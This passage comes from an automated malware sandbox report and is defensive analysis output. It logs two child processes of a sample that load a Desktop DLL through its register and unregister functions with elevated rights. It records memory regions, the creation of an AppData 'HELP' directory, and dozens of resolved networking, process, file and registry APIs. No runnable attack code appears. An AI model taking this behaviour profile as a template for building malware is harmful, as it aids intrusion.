| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 96517 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #38: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #38 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllRegisterServer /fn_args="DefaultInstall" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc34 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C38
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x002cffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x003d0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000003e0000 | 0x003e0000 | 0x0041ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x0054ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000740000 | 0x00740000 | 0x0074ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:26 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 96595 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:06:27 (UTC) |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #39: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #39 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllUnregisterServer /fn_args="DefaultInstall" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:33, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:56 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc48 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
C4C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00050fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x002affff | Private Memory | Readable, Writable |
|
|
|
- |
| locale.nls | 0x002b0000 | 0x00316fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x0000000000320000 | 0x00320000 | 0x003e7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000004a0000 | 0x004a0000 | 0x004affff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004b0000 | 0x004b0000 | 0x005b0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x00000000005c0000 | 0x005c0000 | 0x011bffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0136ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0133ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000001360000 | 0x01360000 | 0x0136ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
